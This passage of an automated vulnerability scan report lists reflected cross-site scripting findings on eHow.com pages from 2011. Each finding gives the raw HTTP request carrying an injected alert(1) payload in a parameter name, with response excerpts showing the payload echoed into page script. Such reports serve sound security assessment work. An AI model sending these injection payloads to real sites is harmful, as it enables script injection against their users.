Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.429. http://www.ehow.com/topic_363_winter-sports.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /topic_363_winter-sports.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2604e'-alert(1)-'eed98f4b047 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_363_winter-sports.html?2604e'-alert(1)-'eed98f4b047=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:40 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=363; expires=Thu, 02-Feb-2012 15:14:40 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49424
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Hit the Slopes for Winter Fitness - Downhill sk ...[SNIP]... <fb:like href="http://www.ehow.com/topic_363_winter-sports.html?2604e'-alert(1)-'eed98f4b047=1" ref="like" width="300"> ...[SNIP]...
1.430. http://www.ehow.com/topic_3818_flu-guide.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /topic_3818_flu-guide.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39151'-alert(1)-'99641d9590d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_3818_flu-guide.html?39151'-alert(1)-'99641d9590d=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.431. http://www.ehow.com/topic_3990_home-security-systems-guide.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /topic_3990_home-security-systems-guide.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ae0b'-alert(1)-'f561b0ceb97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_3990_home-security-systems-guide.html?9ae0b'-alert(1)-'f561b0ceb97=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.432. http://www.ehow.com/topic_401_home-alarms.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /topic_401_home-alarms.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27202'-alert(1)-'bf34bd8751a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_401_home-alarms.html?27202'-alert(1)-'bf34bd8751a=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Home Alarms - Home Alarm Systems | eHow.com </ ...[SNIP]... <fb:like href="http://www.ehow.com/topic_401_home-alarms.html?27202'-alert(1)-'bf34bd8751a=1" ref="like" width="300"> ...[SNIP]...
1.433. http://www.ehow.com/topic_4028_preparing-flu-season.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /topic_4028_preparing-flu-season.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c72be'-alert(1)-'7ba2f5cfed6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_4028_preparing-flu-season.html?c72be'-alert(1)-'7ba2f5cfed6=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:52 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=4028; expires=Thu, 02-Feb-2012 15:16:52 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42390
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Preparing for Flu Season | eHow.com </title>
1.434. http://www.ehow.com/topic_4127_home-alarm-system-guide.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /topic_4127_home-alarm-system-guide.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8563f'-alert(1)-'3de31e10d00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_4127_home-alarm-system-guide.html?8563f'-alert(1)-'3de31e10d00=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.435. http://www.ehow.com/topic_429_all-flu.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /topic_429_all-flu.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dac08'-alert(1)-'b2e662a550c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_429_all-flu.html?dac08'-alert(1)-'b2e662a550c=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:03 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=429; expires=Thu, 02-Feb-2012 15:17:03 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44805
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> All About the Flu - Avoid the Flu | eHow.com < ...[SNIP]... <fb:like href="http://www.ehow.com/topic_429_all-flu.html?dac08'-alert(1)-'b2e662a550c=1" ref="like" width="300"> ...[SNIP]...
1.436. http://www.ehow.com/topic_4989_photo-sharing-101.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /topic_4989_photo-sharing-101.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac526'-alert(1)-'86e037a2e87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_4989_photo-sharing-101.html?ac526'-alert(1)-'86e037a2e87=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.437. http://www.ehow.com/topic_49_treating-colds-flus.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /topic_49_treating-colds-flus.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 931c2'-alert(1)-'c447544e077 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_49_treating-colds-flus.html?931c2'-alert(1)-'c447544e077=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:03 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=49; expires=Thu, 02-Feb-2012 15:17:03 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37719
1.438. http://www.ehow.com/topic_5023_jog-lose-weight.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /topic_5023_jog-lose-weight.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7d7a'-alert(1)-'6dddcb2ebd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_5023_jog-lose-weight.html?c7d7a'-alert(1)-'6dddcb2ebd7=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.439. http://www.ehow.com/topic_689_black-white-photos.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /topic_689_black-white-photos.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90ac0'-alert(1)-'2a391c92f95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_689_black-white-photos.html?90ac0'-alert(1)-'2a391c92f95=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:44 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=689; expires=Thu, 02-Feb-2012 15:16:44 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53488
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Take Black and White Photos - Taking Black and ...[SNIP]... <fb:like href="http://www.ehow.com/topic_689_black-white-photos.html?90ac0'-alert(1)-'2a391c92f95=1" ref="like" width="300"> ...[SNIP]...
1.440. http://www.ehow.com/topic_745_capture-enduring-wedding-photos.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /topic_745_capture-enduring-wedding-photos.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc70b'-alert(1)-'a88873815ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_745_capture-enduring-wedding-photos.html?cc70b'-alert(1)-'a88873815ce=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:45 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=745; expires=Thu, 02-Feb-2012 15:16:45 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39751
1.441. http://www.ehow.com/topic_7853_floor-fountains-guide.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /topic_7853_floor-fountains-guide.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 520f6'-alert(1)-'466f9c19c1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_7853_floor-fountains-guide.html?520f6'-alert(1)-'466f9c19c1c=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.442. http://www.ehow.com/topic_7992_floor-water-fountains-101.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /topic_7992_floor-water-fountains-101.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1b74'-alert(1)-'1bd517eadfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_7992_floor-water-fountains-101.html?f1b74'-alert(1)-'1bd517eadfe=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:26 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=7992; expires=Thu, 02-Feb-2012 15:16:26 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38098
1.443. http://www.ehow.com/topic_8016_outdoor-garden-fountains-guide.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /topic_8016_outdoor-garden-fountains-guide.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75e9c'-alert(1)-'b6eca6d525c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_8016_outdoor-garden-fountains-guide.html?75e9c'-alert(1)-'b6eca6d525c=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.444. http://www.ehow.com/topic_8047_water-garden-fountains-101.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /topic_8047_water-garden-fountains-101.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fda0'-alert(1)-'099222e590f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_8047_water-garden-fountains-101.html?5fda0'-alert(1)-'099222e590f=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.445. http://www.ehow.com/toys-and-games/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /toys-and-games/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2468c'-alert(1)-'bd803265f69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /toys-and-games/?2468c'-alert(1)-'bd803265f69=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:14 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72358
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Toys & Games - How To Information | eHow.com</tit ...[SNIP]... <fb:like href="http://www.ehow.com/toys-and-games/?2468c'-alert(1)-'bd803265f69=1" ref="like" width="300"> ...[SNIP]...
1.446. http://www.ehow.com/us-travel/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /us-travel/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d2a7'-alert(1)-'c41efa4ef38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /us-travel/?9d2a7'-alert(1)-'c41efa4ef38=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:16 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 74677
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>US Travel - How To Information | eHow.com</title> ...[SNIP]... <fb:like href="http://www.ehow.com/us-travel/?9d2a7'-alert(1)-'c41efa4ef38=1" ref="like" width="300"> ...[SNIP]...
1.447. http://www.ehow.com/vacations-and-travel-planning/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /vacations-and-travel-planning/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b79c'-alert(1)-'5e746d16608 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /vacations-and-travel-planning/?2b79c'-alert(1)-'5e746d16608=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:16 GMT
Server: Microsoft-IIS/6.0
ETag:
